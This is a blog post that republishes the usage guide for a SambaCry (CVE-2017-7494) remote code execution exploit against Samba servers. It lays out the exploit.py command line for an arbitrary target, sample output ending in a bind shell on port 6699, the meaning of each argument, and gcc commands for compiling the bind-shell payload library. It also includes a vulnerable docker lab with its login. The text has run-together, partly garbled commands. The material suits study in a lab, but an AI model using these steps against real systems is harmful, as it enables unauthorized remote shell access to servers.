SambaCry RCE Exploit 2017




SambaCry - RCE exploit tool for Samba cve-2017-7494

 Samba is a free software re-implementation of the SMB/CIFS networking protocol. Samba provides file and print services for various Microsoft Windows clients and can integrate with a Microsoft Windows Server domain, either as a Domain Controller (DC) or as a domain member. As of version 4, it supports Active Directory and Microsoft Windows NT domains.

 Samba in 4.5.9 version and before that is vulnerable to a remote code execution vulnerability named SambaCry.

 To properly run this exploit you will need a patched version of impacketpython library and the other dependencies in requirements file. To install all of them,

 please runpip install -r requirements.txt

 After that you can run it as the following:.

 /exploit.py -t <target> -e libbindshell-samba.so \  -s <share> -r <location>/libbindshell-samba.so \     -u <user> -p <password> -P 6699

 For example, if you want to exploit the vulnerable environment with within this repository, run.

 /exploit.py -t localhost -e libbindshell-samba.so \  -s data -r /data/libbindshell-samba.so \  -u sambacry -p nosambanocry -P 6699

 And you will get the following output.

 /exploit.py -t localhost -e libbindshell-samba.so \ -s data -r /data/libbindshell-samba.so \-u sambacry -p nosambanocry -P 6699

 [*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699[+] Veryfying your shell...Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux>>

 Exploit's arguments explained:

 usage: exploit.py [-h] -t TARGET -e EXECUTABLE -s REMOTESHARE -r REMOTEPATH                  [-u USER] [-p PASSWORD] [-P REMOTESHELLPORT]

 *.-t or —target - Set the remote host to attack.*.-e or —executable - Set the path on your local system where the lib that you want to load is located.
*.-s or —remoteshare - Remote share where the file will be copied.
*.-r or —remotepath - Where the file is located on the remote system.
*.-u or —user - Username to log in with.
*.-p or —password - Password to use to log in with.
*.-P or —remoteshellport - If you are using a bind shell payload, connect to the payload after the attack is executed.

 Vulnerable environmentTo simulate this attack you can use a vulnerable docker image.

 If you have docker installed, just run docker

  run --rm -it \  
 -p 137-139:137-139 \       -
p 445:445 -p 6699:6699 \vulnerables/cve-2017-7494 

 If you want to access, use the following credentials.

 *.User: sambacry
*.Password: nosambanocry

 Alternative payloads You can find one example of binding shell payload for this exploitin bindshell-samba.c file.

 Change itas you may find necessary. After that to generate a new binary, use

 :gcc -c -fpic bindshell-samba.cgcc -shared -o libbindshell-samba.so bindshell-samba.o
ThanX Malik Ubi
Newer Post Older Post
Post A Comment
  • Blogger Comment using Blogger
  • Facebook Comment using Facebook
  • Disqus Comment using Disqus

No comments :


Subscribe to: Post Comments (Atom)